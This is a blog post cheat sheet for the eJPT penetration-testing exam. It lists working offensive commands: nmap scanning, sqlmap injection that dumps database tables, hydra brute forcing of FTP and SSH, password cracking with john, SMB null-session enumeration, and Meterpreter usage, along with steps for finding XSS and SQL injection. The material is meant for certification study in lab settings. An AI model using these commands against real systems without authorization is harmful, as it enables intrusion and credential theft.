Hello readers ,I recently cracked eJPT on 26th April 2021 ,so in this article I am going to share commands and tricks to crack eJPT
The hope is that this resource can be helpful to other student studying for this certification. For my full thoughts on this certification in the form of a review, check out my other post How I cracked eJPT successfully ; eJPT Review
Everything you need to pass the eJPT exam is covered in the Penetration Testing Student (PTS) learning path on INE, which is part of the free Starter Pass
You have 72 hours to complete your exam and 1 free retake if you fail
The exam is hands-on and has 20 multiple choice questions based on your findings
PTS Training for Free –> https://my.ine.com/CyberSecurity/learning-paths/a223968e-3a74-45ed-884d-2d16760b8bbd/penetration-testing-student
Because the PTS training is free, you’ll only have to pay for the $200 eJPT voucher to get certified.
One thing I am almost sure you will have to do is set up IP routing and routing tables. There are plenty of resources available online for this, but the course content itself seemed to be pretty lacking here. This is probably the thing that I had the most trouble configuring.
ip route add ROUTETO via ROUTEFROM
Anyone experienced in penetration testing will tell you that enumeration is 90% of the battle, and I don’t disagree. Although the eJPT doesn’t require a very in depth enumeration cycle, it does cover a broad number of techniques.
fping -a -g <ip range> 2>/dev/null
nmap -sn <ip range>
nmap -Pn -O <ip>
Nmap Scan (Quick)
nmap -sC -sV <ip>
Nmap Scan (Full)
nmap -sC -sV -p- <ip>
Nmap Scan (UDP Quick)
nmap -sU -sV <ip>
The following commands could be useful when enumerating and attacking web applications in exam
Directory and File Scanning
My preferred tool at the moment is dirbuster, I find it to to be fast and easy to use. But for a more in depth scan and customization , use gobuster and include a large wordlist.
gobuster -u <ip> -w /path/to/wordlist.txt
Cross Site Scripting (XSS)
The general steps I use to find and test XSS are as follows:
- Find a reflection point
- Test with <i> tag
Reflected XSS = Payload is carried inside the request the victim sends to the website. Typically the link contains the malicious payload
Persistent XSS = Payload remains in the site that multiple users can fall victim to. Typically embedded via a form or forum post
Before using sqlinjection you need to find the vulnerable parameter;
First identify the vuln parameter
Second use \ ' " etc to break the page
Third try to balance it with - –+ – - # %23
If you can’t find by this method use boolean query
Get database if injection Exists
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs\
Get Tables in a Database
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables
Get data in a Database tables
sqlmap -u “http://10.10.10.10/file.php?id=1” -p id -D dbname -T table_name –dump
sqlmap -u “http://10.10.10.10/login.php” –data=“user=admin&password=admin” -D dbname -T table_name –dump
The other type of ‘attack’ you will be doing are system attacks. Make sure you understand why/how to brute force types of services and hashes, as well as basic metasploit usage.
This prepares a file for use with John the Ripper
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
Brute Forcing with Hydra
If we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we’d use the following command:
hydra -l user -P passlist.txt ftp://10.10.18.178
hydra -l <username> -P <full path to pass> 10.10.18.178 -t 4 ssh
Windows Shares Using Null sessions
nmblookup -A 10.10.10.10
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
enum4linux -a 10.10.10.10
Last thing you need in exam is Metasploit ,go through Metasploit .learn it by heart ,
The below are some handy commands for use with a Meterpreter session.
sessions -i 1
sysinfo, ifconfig, route, getuid
download x /root/
upload x C:\\Windows
Few points about the exam which you should take care and not make the mistakes I made:-
1-Try imagining the network structure (this will help you with the pivoting thing if you got stuck)
2-Don’t rush into things and get excited about something ,which I did and in that Adrenaline rush ,I ran into a silly problem early on , after which I took a step back to take a look at what was I not able to see only to find the answer staring back at me.
3-Maybe the payload isn’t suitable with the system? or whatever you have done for the same scenario in Lab; you need to think something ahead of that.
4-Think like a hacker ,you can use Metasploit ,so try to utilize it’s power ,you may have to do trial and error looking for the exact exploit to work ,and in this context take help from youtube and google .And also lemme tell you Old systems may have more than one vulnerability ,you can try looking for other exploits to get a system shell 😉
5-Keep a calm head, the answer will probably the first thing which you had thought of but dismissed it thinking that it would have been too easy.Also don’t waste your time in useless heavy nmap scans, the basic scan will suffice.
I hope this will be helpful for you….